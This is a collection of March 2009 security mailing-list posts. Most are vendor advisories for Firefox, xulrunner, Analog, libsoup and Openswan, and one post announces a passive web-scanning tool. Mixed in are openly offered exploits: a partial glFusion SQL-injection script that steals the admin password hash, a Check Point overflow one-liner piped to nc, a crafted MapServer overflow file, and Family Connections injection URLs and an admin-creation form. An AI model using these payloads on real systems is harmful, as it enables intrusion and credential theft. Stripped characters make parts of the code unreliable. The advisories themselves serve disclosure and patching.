[USN-745-1] Firefox and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-745-1 March 28, 2009 firefox, firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2009-1044, CVE-2009-1169 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1 Ubuntu 7.10: firefox 2.0.0.21~tb.21.308+nobinonly-0ubuntu0.7.10.1 Ubuntu 8.04 LTS: firefox-3.0 3.0.8+nobinonly-0ubuntu0.8.04.2 xulrunner-1.9 1.9.0.8+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser3.0.8+nobinonly-0ubuntu0.8.10.2 firefox-3.0 3.0.8+nobinonly-0ubuntu0.8.10.2 xulrunner-1.9 1.9.0.8+nobinonly-0ubuntu0.8.10.1 After a standard system upgrade you need to restart Firefox and any applications that use xulrunner, such as Epiphany, to effect the necessary changes. Details follow: It was discovered that Firefox did not properly perform XUL garbage collection. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or execute arbitrary code with the privileges of the user invoking the program. This issue only affected Ubuntu 8.04 LTS and 8.10. (CVE-2009-1044) A flaw was discovered in the way Firefox performed XSLT transformations. If a user were tricked into opening a crafted XSL stylesheet, an attacker could cause a denial of service or execute arbitrary code with the privileges of the user invoking the program. (CVE-2009-1169) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1.diff.gz Size/MD5: 11 4c0e1bcc5b9c6628cabb1043e00e232e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1.dsc Size/MD5: 2389 4c85617a64728b2735fa16dbad02d549 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614l.orig.tar.gz Size/MD5: 49519625 c566aa02a30d72b532b1831df653fa27 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_all.deb Size/MD5:53936 1847ca99bedc6c3b3a9e452b78fc http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_all.deb Size/MD5:53046 a389c09950c126495ba024ccd61e6c99 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 47686418 ec36b8546bbc4916096b55d05ee5fe4d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 2859286 0e9174111e38cf2c1962acebff79483d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5:86304 f9988fd7e2a5caea479d4c7ac53437f5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 9494192 0f830daf3dde2de3f8ffddc128ba1d28 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 222592 7399acc67756f6af23c4a86e41a6670e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 166156 9cd3f1bcd036a5fa4d04d11cbb10a0bb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 248148 7f09db8598e69799f131aec1c4d10fb2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 826572 30171fcf81e6a0736457067d489c351f http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_amd64.deb Size/MD5: 218878 dc19e2d7c1d904bbe28385bbea946894 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_i386.deb Size/MD5: 44229562 65e5840f0b11f6c5675afcf0b85cfd2d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614l-0ubuntu1_i386.deb
[SECURITY] [DSA 1756-1] New xulrunner packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1756-1secur...@debian.org http://www.debian.org/security/ Noah Meyerhans March 29, 2009 http://www.debian.org/security/faq - Package: xulrunner Vulnerability : multiple Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-1169 CVE-2009-1044 Several remote vulnerabilities have been discovered in Xulrunner, a runtime environment for XUL applications, such as the Iceweasel web browser. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-1169 Security researcher Guido Landi discovered that a XSL stylesheet could be used to crash the browser during a XSL transformation. An attacker could potentially use this crash to run arbitrary code on a victim's computer. CVE-2009-1044 Security researcher Nils reported via TippingPoint's Zero Day Initiative that the XUL tree method _moveToEdgeShift was in some cases triggering garbage collection routines on objects which were still in use. In such cases, the browser would crash when attempting to access a previously destroyed object and this crash could be used by an attacker to run arbitrary code on a victim's computer. Note that after installing these updates, you will need to restart any packages using xulrunner, typically iceweasel or epiphany. For the stable distribution (lenny), these problems have been fixed in version 1.9.0.7-0lenny2. As indicated in the Etch release notes, security support for the Mozilla products in the oldstable distribution needed to be stopped before the end of the regular Etch security maintenance life cycle. You are strongly encouraged to upgrade to stable or switch to a still supported browser. For the unstable distribution (sid), these problems have been fixed in version 1.9.0.8-1 We recommend that you upgrade your xulrunner package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.7-0lenny2.dsc Size/MD5 checksum: 1777 be107e8cce28d09395d6c2b0e2880e0b http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.7.orig.tar.gz Size/MD5 checksum: 43683292 f49b66c10e021debdfd9cd3705847d9b http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.7-0lenny2.diff.gz Size/MD5 checksum: 115665 4886b961a24c13d9017e8f261b7a4ad4 Architecture independent packages: http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.7-0lenny2_all.deb Size/MD5 checksum: 1480030 c12b4d6d534c0f12ec8e19760ca52a9b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum:69048 cbcfc3f9addacdd2a6641980876910f1 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 7725982 c5075bc0634cb5b2cfc8b64649f9511e http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 3587626 1ce3de601c764c9bfb0c3998566f2baa http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 887434 d373f8ed294bc6184a188bc820e04d6b http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 220394 8ac87390e12115281d335b8773fb5733 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 152152 76761d21f53d017af1ff349e528664ea http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 372048 ba88e43241ab33621169f2e352bdf634 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.7-0lenny2_amd64.deb Size/MD5 checksum: 50084206 d44a3028e5049f2b8051a5f6ed632fe6
[tool release] Watcher v1.0.0 - passive Web-app security testing and compliance auditing
Watcher is a runtime passive-analysis tool for HTTP-based Web applications. It complements static code analysis and manual security reviews by providing painless verification of operational and code-level issues at runtime. Watcher works seamlessly with todays complex Web 2.0 applications by running silently in the background while you drive your browser and interact with the Web-application. It is being released for free under an Open Source license, the binaries and source are available through CodePlex at http://websecuritytool.codeplex.com/. A screenshot of the reporting screen is also there. This tool provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads, cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more. Major Features: 1. Silent and passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, and CSS 2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser 3. Non-intrusive, will not raise alarms or damage production sites 4. Real-time analysis and reporting - findings are reported as theyre found, exportable to XML 5. Configurable domains with wildcard support 6. Extensible framework for adding new checks Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Its built in C# as a small framework with 30+ checks already included. New checks can be easily created to perform custom audits specific to your policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify: Cross-domain stylesheet and javascript references User-controllable cross-domain references User-controllable attribute values such as href, form action, etc. Cross-domain form POSTs Insecure cookies which don't set the HTTPOnly or secure flags Open redirects which can be abused by spammers and phishers Insecure Flash object access through allowScriptAccess Insecure Flash crossdomain.xml Insecure Silverlight clientaccesspolicy.xml Charset declarations which could introduce vulnerability (non-UTF-8) User-controllable charset declarations Dangerous context-switching between HTTP and HTTPS Insufficient use of cache-control headers when private data is concerned (e.g. no-store) Potential HTTP referer leaks of sensitive user-information Potential information leaks in URL parameters Source code comments worth a closer look Hidden debugging messages from Web and Database servers Insecure authentication protocols like Digest and Basic SSL certificate validation errors SSL insecure protocol issues (allowing SSL v2) Unicode issues with invalid byte streams more . Reducing false positives is a high priority, suggestions are welcome. Right now each check takes steps to reduce false positives, some better than others, and checks can be individually disabled if theyre generating too much noise. E.g. we know that only certain cookies such as session cookies need HttpOnly set, but figuring this out automatically has proven difficult without requiring the user to specify the cookie name. New checks are being planned, and new check ideas or contributions are very welcome. For example: Unicode transformation hot-spot detection (planned) User-controllable javascript events (planned) Contact me with any questions, bugs, or suggestions. -Chris Weber
[ GLSA 200903-40 ] Analog: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200903-40 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Analog: Denial of Service Date: March 29, 2009 Bugs: #249140 ID: 200903-40 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A Denial of Service vulnerability was discovered in Analog. Background == Analog is a a webserver log analyzer. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-admin/analog 6.0-r2 = 6.0-r2 Description === Diego E. Petteno reported that the Analog package in Gentoo is built with its own copy of bzip2, making it vulnerable to CVE-2008-1372 (GLSA 200804-02). Impact == A local attacker could place specially crafted log files into a log directory being analyzed by analog, e.g. /var/log/apache, resulting in a crash when being processed by the application. Workaround == There is no known workaround at this time. Resolution == All Analog users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-admin/analog-6.0-r2 NOTE: Analog is now linked against the system bzip2 library. References == [ 1 ] CVE-2008-1372 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372 [ 2 ] GLSA 200804-02 http://www.gentoo.org/security/en/glsa/glsa-200804-02.xml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200903-40.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
glFusion = 1.1.2 COM_applyFilter()/order sql injection exploit
?php
/*
glFusion = 1.1.2 COM_applyFilter()/order sql injection exploit
by Nine:Situations:Group::bookoo
working against Mysql = 4.1
php.ini independent
our site: http://retrogod.altervista.org/
software site: http://www.glfusion.org/
google dork: Page created in seconds by glFusion +RSS
Vulnerability, sql injection in 'order' and 'direction' arguments:
look ExecuteQueries() function in
/private/system/classes/listfactory.class.php, near line 336:
...
// Get the details for sorting the list
$this-_sort_arr['field'] = isset($_REQUEST['order']) ?
COM_applyFilter($_REQUEST['order']) : $this-_def_sort_arr['field'];
$this-_sort_arr['direction'] = isset($_REQUEST['direction']) ?
COM_applyFilter($_REQUEST['direction']) : $this-_def_sort_arr['direction'];
if (is_numeric($this-_sort_arr['field'])) {
$ord = $this-_def_sort_arr['field'];
$this-_sort_arr['field'] = SQL_TITLE;
} else {
$ord = $this-_sort_arr['field'];
}
$order_sql = ' ORDER BY ' . $ord . ' ' .
strtoupper($this-_sort_arr['direction']);
...
filters are inefficient, see COM_applyFilter() which calls
COM_applyBasicFilter()
in /public/lib-common.php near line 5774.
We are in an ORDER clause and vars are not surrounded by quotes,
bad chars are ex. , , / ,', ;, \,,*,`
but what about spaces and (... you can use a CASE WHEN .. THEN ..
ELSE .. END
construct instead of ex. IF(..,..,..) and -- instead of /* to
close
your query.
And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible, COM_applyFilter() is a very common used
one.
Additional notes: 'direction' argument is uppercased by strtoupper(),
you know that table identifiers on Unix-like systems are case
sensitives
but not on MS Windows, however I choosed to inject in the 'order' one
for better results.
Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or
$_COOKIE[], which is not intended I suppose.
This exploit extracts the hash from users table; also note that you do
not need to crack the hash, you can authenticate as admin with the
cookie:
glfusion=[uid]; glf_password=[hash];
as admin you can upload php files in public folders!
Very soft mitigations: glFusion does not show the table prefix in sql
errors, default however is 'gl_'. I prepared a fast routine to extract
it from information_schema db if availiable.
To successfully interrogate MySQL you need at least 2 records in the
same topic section, however the default installation create 2 links with
topic glFusion
*/
$err[0]=[!] This script is intended to be launched from the cli!;
$err[1]=[!] You need the curl extesion loaded!;
if (php_sapi_name() cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) : nil;
}
else {
!dl(php_curl.so) ? die($err[1]) : nil;
}
}
function syntax(){
print (
Syntax: php .$argv[0]. [host] [path] [[port]] [OPTIONS]
\n.
Options:
\n.
--port:[port] - specify a port
\n.
default - 80
\n.
--prefix- try to extract table prefix from
information.schema\n.
default - gl_
\n.
--uid:[n] - specify an uid other than default
(2,usually admin)\n.
--proxy:[host:port] - use proxy
\n.
--enforce - try even with 'not vulnerable'
message );
die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host=$argv[1];
$path=$argv[2];
$prefix=gl_; //default
$uid=2;
$where= uid=$uid; //user id, usually admin, anonymous = 1
$argv[2] ? print([*] Attacking...\n) : syntax();
$_f_prefix=false;
$_use_proxy=false;
$port=80;
[ MDVSA-2009:081 ] libsoup
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:081 http://www.mandriva.com/security/ ___ Package : libsoup Date: March 27, 2009 Affected: 2008.0, Corporate 3.0 ___ Problem Description: An integer overflow in libsoup Base64 encoding and decoding functions enables attackers either to cause denial of service and to execute arbitrary code (CVE-2009-0585). This update provides the fix for that security issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0585 ___ Updated Packages: Mandriva Linux 2008.0: 1972c4b9fcdd24c4e58a5d8126934192 2008.0/i586/libsoup-2.2_8-2.2.100-1.1mdv2008.0.i586.rpm bdd6df7a38ef005ee0f04783dee36756 2008.0/i586/libsoup-2.2_8-devel-2.2.100-1.1mdv2008.0.i586.rpm c99c9cabb6fd1391dc3b97850c259694 2008.0/SRPMS/libsoup-2.2.100-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 237ddbddfbee3f0f91a752e4b7433a07 2008.0/x86_64/lib64soup-2.2_8-2.2.100-1.1mdv2008.0.x86_64.rpm 78d90baeb9b5ac5f405577386c68159f 2008.0/x86_64/lib64soup-2.2_8-devel-2.2.100-1.1mdv2008.0.x86_64.rpm c99c9cabb6fd1391dc3b97850c259694 2008.0/SRPMS/libsoup-2.2.100-1.1mdv2008.0.src.rpm Corporate 3.0: 05c986deeb98dd73e1ac22d23ff605ae corporate/3.0/i586/libsoup-1.99.28-1.2.C30mdk.i586.rpm e99b68c6c991d6a97698bf9b08bdf854 corporate/3.0/i586/libsoup-2.0_0-1.99.28-1.2.C30mdk.i586.rpm f67bb628913f0a17f6b29cb2cbc5aa6f corporate/3.0/i586/libsoup-2.0_0-devel-1.99.28-1.2.C30mdk.i586.rpm 2e1a20ca0d80dcf735855a5f95347646 corporate/3.0/SRPMS/libsoup-1.99.28-1.2.C30mdk.src.rpm Corporate 3.0/X86_64: e7863b68562e8f2ea4eebb1d5c4ce05c corporate/3.0/x86_64/lib64soup-2.0_0-1.99.28-1.2.C30mdk.x86_64.rpm 50fd063851379413327a6878fbe44bf3 corporate/3.0/x86_64/lib64soup-2.0_0-devel-1.99.28-1.2.C30mdk.x86_64.rpm dc97738bc5397ea6290372e6fa13bc90 corporate/3.0/x86_64/libsoup-1.99.28-1.2.C30mdk.x86_64.rpm 2e1a20ca0d80dcf735855a5f95347646 corporate/3.0/SRPMS/libsoup-1.99.28-1.2.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJzSPamqjQ0CJFipgRAhZ5AJ9HevNsvcfZOLIRqwzSHZr9DJSFGQCgmNmq 6Qm9NtIGAnHR5QIgDcGxsLE= =DBhP -END PGP SIGNATURE-
Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow - Description The Check Point Firewall-1 PKI Web Service, running by default on TCP port 18264, is vulnerable to a remote overflow in the handling of very long HTTP headers. This was discovered during a pen-test where the client would not allow further analysis and would not provide the full product/version info. Initial testing indicates the 'Authorization' and 'Referer' headers were vulnerable. - Product Check Point, Firewall-1, unknown - PoC perl -e 'print GET / HTTP/1.0\r\nAuthorization: Basic . x x 8192 . \r\nFrom: b...@hugs.com\r\nif-modified-since: Fri, 13 Dec 2006 09:12:58 GMT\r\nReferer: http://www.owasp.org/; . x x 8192 . \r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n' | nc suckit.com 18264 - Solution None - Timeline 2006-11-06: Vulnerability Discovered 2009-03-29: Disclosed to Public -- BugsNotHugs Shared Vulnerability Disclosure Account
CVE-2009-0790: ISAKMP DPD Remote Vulnerability with Openswan Strongswan IPsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 == Openswan Strongswan Security Notification March 30, 2009 Remote DoS Vulnerability in Openswan Strongswan IPsec CVE-2009-0790 == A vulnerability in the Dead Peer Detection (RFC-3706) code was found by Gerd v. Egidy gerd.von.eg...@intra2net.com of Intra2net AG affecting all Openswan and all Strongswan releases. A malicious (or expired ISAKMP) R_U_THERE or R_U_THERE_ACK Dead Peer Detection packet can cause the pluto IKE daemon to crash and restart. No authentication or encryption is required to trigger this bug. One spoofed UDP packet can cause the pluto IKE daemon to restart and be unresponsive for a few seconds while restarting. A patch was created by Paul Wouters p...@xelerance.com for Openswan and Strongswan. This bug affects the following software releases: Current branches: Openswan-2.6.20 and earlier Strongswan-4.2.13 and earlier Maintenance mode branches: Openswan-2.4.13 and earlier Strongswan-2.8.8 and earlier End of Life branches: Superfreeswan-1.9x Openswan-1.x Openswan-2.0.x - 2.3.1 Openswan-2.5.x Everyone is strongly encouraged to upgrade to these minimum versions: openswan-2.6.21 strongswan-4.2.14 openswan-2.4.14 strongswan-2.8.9 If you cannot upgrade to a new version, please apply the appropriate patch as listed at http://www.openswan.org/CVE-2009-0790/ Dead Peer Detection is an IPsec IKE Notification message. It uses an ICOOKIE/RCOOKIE mechanism to match an incoming packet to a know Security Association (ISAKMP). Unlike most Notification messages, DPD notifications have no phase2 state association. Incorrect handling of this exception can cause a NULL pointer dereference on a non-existing state object 'st'. This bug is triggered in the case where one end has expired an ISAKMP state, but the other end still uses the old state to send a DPD Notification. Since this state-lookup is performed before any encryption or decryption takes place, as we need to find the proper ISAKMP to locate the cryptogrpahic key material used for decryption, this bug can be triggered without going through a phase1 (ISAKMP) negotiation. When such a packet is received, the pluto daemon crashes and restarts. Locations for downloading patches and source code: http://www.openswan.org/ http://www.strongswan.org/ ftp://ftp.openswan.org/openswan/ http://download1.strongswan.org/ ftp://ftp.openswan.fi/pub/openswan/http://download2.strongswan.org/ Paul Wouters p...@xelerance.com GPG key: 0xB5CC27E1 == -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEVAwUBSdDsnecYBqa1zCfhAQIgkQf9GGalx45xj5xmdXlSB/BZgRXhQW4fNWHp ZLLt5c40hOSvcmNfgYoIEz/QKpZPjfldvJ+c/08bAyAEQiHmmKkK+cFTlH1LtpDg 1f70lLrsziQ/eK1sQ9EYlFG4gbRfzjl1XZnnijAYvCAS1W12VSIU9gKN0YnHSCjH ndiGTxtYPEYhzm7QzraYPB28BqBqvdQcMMwbfTThjYHMowzt6fMzFEteCTqJ5YAT WgNbbbxBz1gNGssoiN4bv0YxaT+701OfKCdgJKKXs61We3twEQ2XKCi6l5Xw/lJe mrbVHYgUGy/ef70sN03O/vN5o+2If1n0Pib6usdeEcVA0L9RQOIW5A== =NxrM -END PGP SIGNATURE-
Positron Security Advisory #2009-000: Multiple Vulnerabilities in MapServer v5.2.1 and v4.10.3
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
POSITRON SECURITY LLC
http://www.positronsecurity.com/
Security Advisory #2009-000
Multiple Vulnerabilities in MapServer v5.2.1 and v4.10.3
Author: Joe Testa jt _at_sign_ positronsecurity_dot_com
Date:March 30th, 2009
URL: http://www.positronsecurity.com/advisories/2009-000.html
I. Executive Summary
MapServer [1] is a popular open-source, multi-platform program for
creating interactive map applications. It was originally developed by
the University of Minnesota with support from the U.S. National
Aeronautics and Space Administration (NASA) [2]. It is currently
supported by the Open Source Geospatial Foundation [3].
Several security vulnerabilities were identified in MapServer v5.2.1
and v4.10.3. All users are urged to upgrade to v5.2.2 or v4.10.4 as
soon as possible to protect against attack.
II. Overview
During an audit of the MapServer v5.2.1 source code, five (5)
vulnerabilities were identified ranging from low to medium/high
severity. They include stack and heap overflows, a relative path
writing weakness, a file content leakage, as well as a file existence
leakage. Furthermore, after reporting these issues to the vendor, a
second audit by the project maintainer not only determined that v4.10.3
was also affected, but that four (4) additional stack overflows existed
in the code as well.
III. Detailed Description
A. Stack-based Buffer Overflow (CVE-2009-0839)
Severity: Medium/High
A buffer overflow that could allow for the execution of arbitrary
code exists in the mapserv CGI program. In mapserv.c are the
following lines of code:
406: strncpy(mapserv-Id, mapserv-request-ParamValues[i], IDSIZE);
1112: int main(int argc, char *argv[]) {
1114:char buffer[1024], *value=NULL;
1783:sprintf(buffer, %s%s%s%s, mapserv-map-web.imagepath, \
mapserv-map-name, mapserv-Id, MS_QUERY_EXTENSION);
1826: }
Notice that no size checking is done at line 1783 on the buffer
named buffer, defined at line 1114. It is filled with three variables
and one static string. The first variable,
mapserv-map-web.imagepath, is assigned the value of the IMAGEPATH
attribute inside the *.map file stored on the server. The second,
mapserv-map-name, is taken from the NAME attribute inside the same
map file. The third variable, mapserv-Id, is read from user input
at line 406, though it is restricted to IDSIZE (128) bytes. Thus, a
buffer overflow can be achieved by creating a map file on the server
with overly long IMAGEPATH and/or NAME attributes; their values will be
stored past the end of buffer and will overwrite saved register
values. If the following specially-crafted map file (bof.map) is
stored on the server (either by creating it directly, or tricking a
legitimate user into placing it onto the file system):
MAP
NAME {A x 1072}
STATUS ON
SIZE 100 100
EXTENT 0 0 1 1
WEB
IMAGEPATH /tmp/
TEMPLATE /tmp/template.html
END
END
... and if the following request is made:
http://site/cgi-bin/mapserv?map=/tmp/bof.mapmode=query;
queryfile=/tmp/queryfile.qfsavequery=1id=
... then the following crash occurs on a CentOS v5.2/x86 platform:
Program received signal SIGSEGV, Segmentation fault.
0x0804fdca in main ()
(gdb) disassemble main
[...]
0x0804fd9e main+2318: call 0x804bee0 spri...@plt
0x0804fda3 main+2323: mov%edi,0x4(%esp)
0x0804fda7 main+2327: mov(%esi),%eax
0x0804fda9 main+2329: mov0x10(%eax),%eax
0x0804fdac main+2332: mov%eax,(%esp)
0x0804fdaf main+2335: call 0x8074aa0 msSaveQuery
0x0804fdb4 main+2340: test %eax,%eax
0x0804fdb6 main+2342: je 0x804fb02 main+1650
0x0804fdbc main+2348: add$0x4e8,%esp
0x0804fdc2 main+2354: pop%ecx
0x0804fdc3 main+2355: pop%ebx
0x0804fdc4 main+2356: pop%esi
0x0804fdc5 main+2357: pop%edi
0x0804fdc6 main+2358: pop%ebp
0x0804fdc7 main+2359: lea0xfffc(%ecx),%esp
0x0804fdca main+2362: ret
[...]
(gdb) i r
eax0x1 1
ecx0x47474747 1195853639
edx0x0 0
ebx0x48484848 1212696648
esp0x47474743 0x47474743
ebp0x4b4b4b4b 0x4b4b4b4b
esi0x49494949 1229539657
edi0x4a4a4a4a 1246382666
eip0x804fdca0x804fdca main+2362
[...]
Because the ECX register can be controlled (0x47 is the ASCII code for
the letter G), the attacker can control the ESP register through the
lea 0xfffc(%ecx),%esp instruction at 0x0804fdc7. The attacker can
execute code in mapserv's process space by setting the ESP register to
an address that holds a reference to code and letting the
Family Connections 1.8.1 Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User html head titleFamily Connection 1.8.1 Create Admin User Exploit/title /head body pThis exploit creates an user with administrator privileges using follows information:br Username: rootbr Password: toorbr form action=http://localhost/fcms/register.php; method=POST input type=hidden name=username value=blabla input type=hidden name=password value=blabla input type=hidden name=email value=bla...@blabla.blabla input type=hidden name=fname value=blabla input type=hidden name=lname value=blabla input type=hidden name=year value=00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'r...@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#' input type=submit name=submit value=Exploit /form /body /html To activate accounts: http://www.site.com/path/activate.php?uid=1 or 1=1code= [C] Blind SQL Injection POST /path/lostpw.php HTTP/1.1\r\n Host: www.site.com\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 193\r\n\r\n 